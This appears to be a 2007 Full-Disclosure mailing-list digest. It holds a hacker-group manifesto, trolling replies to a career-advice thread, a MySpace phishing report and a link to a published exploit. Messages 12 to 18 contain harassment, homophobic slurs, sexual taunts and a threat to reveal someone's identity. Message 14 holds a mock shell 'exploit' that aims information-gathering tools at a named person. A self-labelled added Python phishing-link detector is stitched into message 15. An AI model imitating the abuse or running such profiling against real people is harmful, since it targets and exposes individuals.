time appropriate to state COMMUNIQUE POINT NUMBER ONE:
"RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING
POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF,
A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT
ASSISTANCE OR AFFILIATION."
It should be pointed out that although RCHRAFE has strong
ties to the American Republican Party and political
republican ideology, we do not participate actively
in government politics of any kind.
PERTAINING TO the overall goals of RCHRAFE as an organization
and the pervasive RCHRAFE social movement, we have distinct
purpose and bearing.
While RCHRAFE assimilates no political or social goals in
and of themselves, we reserve the right to voice opinion
when political or social policies or activities relate
to these aforementioned goals.
These goals, stated, comprise COMMUNIQUE POINT NUMBER
TWO:
"RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS,
MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES."
We may surmise in corollary then, by the combined
observations of communique points one and two, that RCHRAFE
is in definition a usurping entity, and will tend to
remain benign concerning rival computer groups.
TO CONCLUDE, RCHRAFE will exist as long as the interests
of the corollaries are subject to external change. We
reserve the right to maintain the status of RCHRAFE and
the goals of the corollaries by any means necessary, but
never by exceeding necessary means.
We Shall Rise!
------------------------------
Message: 12
Date: Tue, 20 Nov 2007 07:33:09 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
Professional ?
To: worried security <worriedsecurity () googlemail com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47427FA5.2090307 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
worried security wrote:
On Nov 17, 2007 1:08 PM, Meef <massa () iut-dhaka edu> wrote:
What are the steps to follow to become a computer security
professional ?,
Sorry, you will never make it to professionalism as you broke the
first and most important rule.
NEVER POST ON A PUBLIC MAILING LIST!!!!
And you are here because, you are 'worried security'.
The second most important rule of becoming a security professional is,
if you do need to post to a public mailing list then never do it under
a .edu or .gov or official company e-mail address, we will all just
point and laugh and have your account hi-jacked with the next
cross-site scripting flaw that gets to the public mailing list.
But I thought the first most important rule, which was not to be broken,
was not to post on a security mailing list, such as this.
Kindly go through your cross-site request forgery techniques with me,
I'm really in need of a m3nt0r
The third most important rule to becoming a security professional is
never talk to people on public mailing lists who have broken rule one
and rule two or take what's said on public mailing lists seriously. As
soon as you take what is said on a public mailing list seriously is
the day you should cut your wrists.
He's getting so horny right now
Always get advice from a credible source after learning of a threat on
the public mailing lists.
Like worried security?
Please tell me if you think the linux/tcp stack is currently vulnerable.
I have N0 1D34
The fourth most important rule to becoming a security professional,
always use a throw-away e-mail account so it doesn't matter of script
kids hi-jack your e-mail account with the next cross-site scripting
vulnerability that gets posted to the public mailing lists.
HIJACK THIS BITCH
The fifth most important rule to becoming a security professional is
use an alias on public mailing lists, never use your real name, place
of work, place of education, place of living, as backfires cannot be
reversed. Once you've posted something it's posted, archived around the
world and translated into more languages than you can shake a stick
at.
Y0u juzt m1ght be shirl0ck h0lm3z
The sixth most important rule to becoming a security professional is
be paranoid. Yes, don't listen to people who say paranoia is bad for
you. In this industry it pays to be paranoid. Forget about your own
welfare, you've got millions of users and the economic stability of
the world to think about. Trade in your own life to save the life of
others. Indeed being a security professional will mean long hours, and
sleepless nights. Be prepared to be woken up in the middle of the
night and expect to have people shouting for answers down the phone to
you or rush you into the security operations center when news of a
major data breach reaches the inbox of your security team.
"Be prepared to be woken up in the middle of the
night and expect to have people shouting for answers down the phone to
you or rush you into the security operations center when news of a
major data breach reaches the inbox of your security team."
This is what a professional at computer security undergoes?
I thought I could just, be in my bedroom reading about aix
security enhancements and win32 buffer overflow prevention methods
The seventh most important rule to becoming a security professional.
Think for yourself don't post ridiculous questions to a public mailing
list and expect to get the right answer, most folks will make anything
up and people generally cannot be trusted. Use search engines, read
books and free your mind from what other security researchers are
doing. Don't duplicate, originate your own work.
He talks a whole lot about mailing lists
The eighth most important rule to becoming a good security
professional is have balls, if you think something is wrong, don't be
afraid to speak up, even if it means losing your job. Remember, the
security of other people comes before the security of your job
position. So if you think something is wrong, tell people about it,
and if they don't listen, then keep repeating it over and over. Never
give in and keep on trying to tell people about something you believe
in. You are a slave to the security of others, you don't come first
"they" do.
So what's wrong buddy?
Ninth most important rule to becoming a good security professional.
Don't read public mailing lists, don't read security news sites, and
don't read web logs about what other people think about security. They
all suck, don't trust anyone in this world and don't believe the hype.
99.9% of anything posted in public is attention grabbing bullshit, you
don't need it. Concentrate with what's going on within your own company
and screw all the others. Only read these mediums if it's related to
what you're doing that day at work to fix a bug or thwart a security
incident. Don't read about what could happen, stick to with what's
actually happening to you that day. Not what other people say is going
to happen next week.
Tenth most important rule to becoming a security professional, know
your enemy. Yes, get to know them, eavesdrop on them, send them gifts
and make them feel special. Your enemy is the single most important
person to you and your company's assets. If you don't know what your
enemy is doing then you don't have security. Remember though, don't
concentrate on other people's enemies, concentrate on enemies for your
company. Don't read websites that say they are your enemy, because it's
unlikely they really are. Your real enemies don't announce themselves
often and are unlikely to make public announcements about it, and the
ones that do are usually hoaxes.
Fuck, I couldn't read it all.. I got exhauzted
rchrafe.wordpress.com
------------------------------
Message: 13
Date: Tue, 20 Nov 2007 07:46:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
Professional ?
To: Richard Golodner <rgolodner () infratection com>
Cc: full-disclosure () lists grok org uk
Message-ID: <474282E2.50009 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Richard Golodner wrote:
Get a good job where you can find best security practices being used
and learn from others who have been in the field. You will develop your own
set of tools and ideas, but the concepts are almost always the same. Defense
in depth is a good idea and it works.
11th most important rule. Never ever take advice that has ten rules
about something they know nothing about.
N3TD3V, please go away. Come back under a different alias if you
must but please STFU!
The guy wanted a serious answer and you broke many of your own
rules. Don't get your kilt all bunched up, just be serious for once in your
net-sec career.
Richard Golodner
Infratection IT Services
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
You're so gay dude
------------------------------
Message: 14
Date: Tue, 20 Nov 2007 07:49:20 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security
Professional ?
To: XSS Worm XSS Security Information Portal
<cross-site-scripting-security () xssworm com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47428370.6050500 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
XSS Worm XSS Security Information Portal wrote:
#!/bin/sh
# 0day exploit for Paul Schmehl
# based on information provided by Paul Schmehl
# pauls () utdallas edu <mailto:pauls () utdallas edu>
#
echo pauls > /hack/edu/utdallas.edu/known.addresses
googledump.pl --email-addresses --context-links
--referers --extended-links -keywords
"Paul","Schmehl","utdallas.edu
<http://utdallas.edu>", "pauls@", "pauls () utdallas
","paul.schmehl@" --verbose
socialgrab.pl --known-address "pauls () utdallas edu
<mailto:pauls () utdallas edu>" --real-name "Paul Schmehl"
--tags=security,hacking,utdallas,vulnerability
--
search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,dig
g,bebo,ebay,blogger,wordpress
--verbose --dump-links
infopull.pl --pgp-search --whois --domaintools --usenet --
trackers
--irclog --mirrors --listserv --known-
addresses="pauls () utdallas edu
<mailto:pauls () utdallas edu>"
echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu
# http://xssworm.com
HAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAH
AHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHA
HAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAA
On 11/19/07, *Paul Schmehl* <pauls () utdallas edu> wrote:
--On November 19, 2007 3:34:23 AM +0000 worried security
<worriedsecurity () googlemail com> wrote:
>
> The fourth most important rule to becoming a security professional,
> always use a throw-away e-mail account so it doesn't matter of script
> kids hi-jack your e-mail account with the next cross-site scripting
> vulnerability that gets posted to the public mailing lists.
>
You forgot the most important rule of all. Pay no heed to bozos who post
anonymously and don't even have a job in security. Their advice is
usually worth just as much as their reputation.
Paul Schmehl (pauls () utdallas edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto: vaj () nospam xssworm com
aim: XSS Cross Site
------
XSS Cross Site Scripting Attacks
Web 2.0 Application Security Information Blog (tm) 2007
http://www.XSSworm.com/
------
"Vaj, bella vaj.
------------------------------
Message: 15
Date: Mon, 19 Nov 2007 20:52:30 -0800
From: "Dancho Danchev" <dancho.danchev () gmail com>
Subject: [Full-disclosure] Large Scale MySpace Phishing Attack
To: full-disclosure () lists grok org uk
Message-ID:
<b787ce30711192052k34755398t7a9c2c3c1c98418 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1
In need of a "creative phishing campaign of the year"? Try this,
perhaps the largest phishing attack spoofing MySpace and collecting
all the login details at a central location, that's been active for
over a month, and continues to be. A Chinese phishing group has come
up with legitimate looking MySpace profiles (profile.myspace.com) in
the form of subdomains at their original .cn domains, and by doing so
achieve its ultimate objective - establish trust through
typosquatting, remain beneath the security vendors' radar by comment
spamming the URLs inside MySpace, and obtain the login details of
everyone who got tricked.
Complete assessment in the form of domains and URLs participating, as
well as the message used per domain for the internal comment spam
campaign, is available here:
http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-attack.html
Regards,
Dancho
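[Added example, not part of the original post or of the linked assessment: one way a defender could flag comment links whose hostname carries the brand's labels (profile.myspace.com) as subdomains of a different parent domain, which is the pattern the message above describes. The function names, the sample comments and the lookalike.example domain are constructed placeholders.]

```python
import re
from urllib.parse import urlsplit

TRUSTED = "myspace.com"  # brand domain named in the post
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

def hostname(url):
    """Lower-cased host of a URL, without a trailing root dot."""
    return (urlsplit(url).hostname or "").rstrip(".").lower()

def classify(url, trusted=TRUSTED):
    """Return 'genuine', 'brand-in-subdomain' or 'unrelated' for a link."""
    labels = hostname(url).split(".")
    t = trusted.split(".")
    # Genuine: the trusted domain is the right-most part of the host.
    if labels[-len(t):] == t:
        return "genuine"
    # Spoof pattern: the trusted labels appear, in order, to the left of
    # some other parent domain. Comparing whole labels (not substrings)
    # keeps hosts such as notmyspace.com from matching.
    for i in range(len(labels) - len(t)):
        if labels[i:i + len(t)] == t:
            return "brand-in-subdomain"
    return "unrelated"

def suspicious_links(comments, trusted=TRUSTED):
    """Return (comment_index, url) for every brand-in-subdomain link."""
    hits = []
    for idx, text in enumerate(comments):
        for url in URL_RE.findall(text):
            if classify(url, trusted) == "brand-in-subdomain":
                hits.append((idx, url))
    return hits

# Constructed sample comments; lookalike.example is a placeholder domain.
SAMPLE_COMMENTS = [
    "check my new pics http://profile.myspace.com.lookalike.example/login",
    "real profile: https://profile.myspace.com/viewprofile",
    "unrelated link http://notmyspace.com/ and http://www.example.org/",
]

if __name__ == "__main__":
    for idx, url in suspicious_links(SAMPLE_COMMENTS):
        print(f"comment {idx}: {url}")
```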
------------------------------
Message: 16
Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: Re: [Full-disclosure] Multiple stack-based buffer
overflows
in dxmsft.dll
To: "full-disclosure () lists grok org uk"
<full-disclosure () lists grok org uk>
Message-ID:
<22163281.1195532704914.JavaMail.root () elwamui-rubis.atl.sa.earthlink.net>
Content-Type: text/plain; charset=UTF-8
I did not see this: http://www.milw0rm.com/exploits/4251, my
apologies, please ignore my last post...
------------------------------
Message: 17
Date: Tue, 20 Nov 2007 08:34:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>,
full-disclosure () lists grok org uk
Message-ID: <47428E22.5060807 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Richard Golodner wrote:
Please come and introduce yourself to me at any Info-Sec conference
or convention so we can meet face to face. We will see what is up then.
Richard Golodner
Mr Golodner,
I'm currently unaware as to why you want us to come and meet you at
an info-sec conference, or convention, things like defcon and HOPE are
for the utterly pathetic.
We don't know what to say, you're too funny to take seriously.
Never email us again, you piece of garbage.
rcbrafe
------------------------------
Message: 18
Date: Tue, 20 Nov 2007 08:57:18 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>,
full-disclosure () lists grok org uk
Message-ID: <4742935E.4060008 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Richard Golodner wrote:
You think those are professional conferences? Those are script
children parties for retards that can't get laid.
LOL -- Like my, RCHRAFE didn't know this.
Come to a Homeland
Security meeting
Our affiliates are members of several.
or a National Security briefing.
What about CTU ?
You can't even hide your
own identity properly.
..
You know who we are?
SHIT
We're going to die a sudden death!
I did not say I wanted to meet you.
That's too bad, I'm horny f0r y0u
What I am saying is that if you
are so tough, step and be a man.
/me stepz up & becomez 4 m4n
At least use your real name or I will begin
to publicize it for you if you would like.
Firstly: Richard Golodner i love pissing you off, it gets me off.
Secondly: Your post previously sometime ago made me cum all over
my
k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003-
08/msg00019.html
You probably don't know the difference between IGRP and EIGRP
routing
protocolz
What a loser, haha.
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 33, Issue 38
***********************************************
|